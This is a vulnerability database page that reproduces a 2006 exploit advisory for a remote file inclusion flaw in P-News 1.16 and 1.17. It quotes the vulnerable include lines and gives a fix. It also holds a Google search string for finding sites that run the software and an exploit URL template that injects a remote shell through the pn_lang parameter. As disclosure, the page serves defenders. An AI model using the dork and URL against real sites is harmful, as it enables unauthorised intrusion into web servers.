Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

P-News 1.16 - Remote File Inclusion

Related Vulnerabilities: CVE-2006-5434  
Publish Date: 16 Oct 2006
Author: vegas78
Source / Download Exploit 
                							

                ============================================
P-News 1.16, 1.17 Remote File Inclusion Vulnerability
============================================

Discovered by vegas78 - feel82[at]web.de
============================================
Greetz: scoper, corny, smaesch0r, Sascha Schmalz, 
        ReFleCtion, BleX, |pupi (?),   
============================================

include("$pn_lang/functions.php"); // bad code
include("$pn_lang/language.php"); // bad code
...

fix:
make absolute path declaration or update to the new 2.* version

// Google string
allintitle:"P-news ver. 1.16" / allinurl:p-news.php

================================================================

http://site/p-news.php?pn_lang=[shell]

================================================================

# milw0rm.com [2006-10-16]

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started